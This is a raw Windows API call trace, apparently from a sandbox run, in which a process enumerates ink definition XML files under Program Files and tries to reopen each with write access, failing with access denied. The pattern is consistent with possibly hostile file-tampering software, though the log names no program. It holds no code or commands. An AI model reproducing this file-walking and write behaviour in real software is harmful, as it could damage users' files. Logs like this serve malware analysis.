ftLastAccessTime.dwLowDateTime=0xa06cd023, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a37a4cb, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.315] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd05, dwReserved0=0x0, dwReserved1=0x0, cFileName="base.xml", cAlternateFileName="")) returned 1 [0083.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ace8 | out: hHeap=0x20000) returned 1 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0083.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0083.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a238 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0083.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.316] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.316] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.316] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.316] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.316] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.316] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.317] AreFileApisANSI () returned 1 [0083.317] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml", lpUsedDefaultChar=0x0) returned 79 [0083.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0083.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.317] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.317] AreFileApisANSI () returned 1 [0083.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0083.317] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0083.317] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 79 [0083.317] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.317] GetFileType (hFile=0x340) returned 0x1 [0083.317] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.318] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.318] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.318] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.318] CloseHandle (hObject=0x340) returned 1 [0083.318] AreFileApisANSI () returned 1 [0083.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0083.318] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x2e430 [0083.318] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cd40, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml") returned 79 [0083.318] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.318] GetLastError () returned 0x5 [0083.318] GetLastError () returned 0x5 [0083.318] SetLastError (dwErrCode=0x5) [0083.318] GetLastError () returned 0x5 [0083.318] SetLastError (dwErrCode=0x5) [0083.318] GetLastError () returned 0x5 [0083.319] SetLastError (dwErrCode=0x5) [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0083.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.319] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.319] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3d5a11, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3d5a11, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3d5a11, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xf7, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="baseAltGr_rtl.xml", cAlternateFileName="")) returned 1 [0083.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0083.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0083.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0083.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0083.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0083.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0083.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0083.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8afe0 [0083.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0083.319] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8afe0 | out: hHeap=0x20000) returned 1 [0083.319] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0083.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81bf8 [0083.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81bf8 | out: hHeap=0x20000) returned 1 [0083.320] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0083.320] AreFileApisANSI () returned 1 [0083.320] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpUsedDefaultChar=0x0) returned 88 [0083.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0083.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.320] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0083.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.320] AreFileApisANSI () returned 1 [0083.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0083.320] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x80fc0 [0083.320] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x80fc0, cchWideChar=88 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 88 [0083.320] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.322] GetFileType (hFile=0x340) returned 0x1 [0083.322] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80fc0 | out: hHeap=0x20000) returned 1 [0083.322] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.322] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.322] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.323] CloseHandle (hObject=0x340) returned 1 [0083.323] AreFileApisANSI () returned 1 [0083.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0083.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0083.323] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b00, cbMultiByte=-1, lpWideCharStr=0x81130, cchWideChar=88 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 88 [0083.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.323] GetLastError () returned 0x5 [0083.323] GetLastError () returned 0x5 [0083.323] SetLastError (dwErrCode=0x5) [0083.323] GetLastError () returned 0x5 [0083.323] SetLastError (dwErrCode=0x5) [0083.323] GetLastError () returned 0x5 [0083.323] SetLastError (dwErrCode=0x5) [0083.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0083.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.323] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0083.323] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.323] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.323] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xdc4, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="base_altgr.xml", cAlternateFileName="")) returned 1 [0083.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.323] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0083.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0083.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0083.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0083.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0083.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0083.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0083.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81d68 [0083.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81d68 | out: hHeap=0x20000) returned 1 [0083.324] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0083.324] AreFileApisANSI () returned 1 [0083.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpUsedDefaultChar=0x0) returned 85 [0083.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0083.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.324] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.324] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0083.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0083.325] AreFileApisANSI () returned 1 [0083.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0083.325] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81410 [0083.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x81410, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 85 [0083.325] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.325] GetFileType (hFile=0x340) returned 0x1 [0083.325] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81410 | out: hHeap=0x20000) returned 1 [0083.325] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.325] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.325] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.326] CloseHandle (hObject=0x340) returned 1 [0083.326] AreFileApisANSI () returned 1 [0083.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 85 [0083.326] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xaa) returned 0x81580 [0083.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a98, cbMultiByte=-1, lpWideCharStr=0x81580, cchWideChar=85 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 85 [0083.326] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft 